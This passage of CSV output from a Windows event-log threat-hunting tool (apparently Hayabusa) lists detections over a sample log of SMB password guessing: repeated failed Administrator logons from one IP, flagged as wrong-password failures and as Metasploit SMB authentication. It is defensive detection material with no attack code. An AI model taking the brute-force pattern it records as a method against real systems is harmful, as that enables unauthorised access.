Password,User: Administrator : Type: 3 : Workstation: qz7gr4vA633waQ01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2TmHz5POLSNJHm2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DcpOxhy2nnLIEGHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gJxfDgfujy5Um2wa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 217VTq8EbYIDeSXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPfE1m0tsJAJnRt9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OQCfGhvBMSq3PIoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XBl6JIRetWEnjaVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXJMNnj4LeBIYARt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3sdn9f4xtvcsaHp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: DWT0NepMYD29cOwh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DDb7wV6uzj1tat2d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RBcmANUL4a6DFobS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL2swHF9MtnCfnp3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0ZkcAD0IakqSUph : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5HgksdIGukmliZeE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYoLckmmOWCSf4Q2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PTxr8Zkz2y2XwBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3caypkIM2XqoSSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yuQOUzJ6sU5AhARR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SyM3OrjUHub9k23k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vY7SRoWumGQOrljW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iFrO2nUMlfeDLGyc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9B8Gq7d30U8DqdN0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxSPuxpCHgSo1d1a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9elGZ4POExblUCAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XHY9Ig3sqQKNXYqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: voMDzTqYqKpfudKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8m9SJ1aFpvFqClU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dM84lQYVfHhZmgpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: O5FrdBbYXWaqFkeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxiNMjsd3YfoCNa2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v1u5uD9SiDFq9VOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pZv9l3b7U8tIVmw8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EfPqiBhm6hRX700 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uvqgri2KGIDAlg1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLXZMXKsjOaurgZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXtiRWHDJqpq69Ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeC1T9YkT1hXMcGG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPf6nlwAeuu7cf00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 4fvVUozD2RuIchN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP3rghcrgas3l3q1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MMtcQYoVoM57gTcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFjTWECEep09Abjt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jUlguy8tKBo4DSUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GETwMERLpiVtMRkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhas9Vjc193EVcOg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
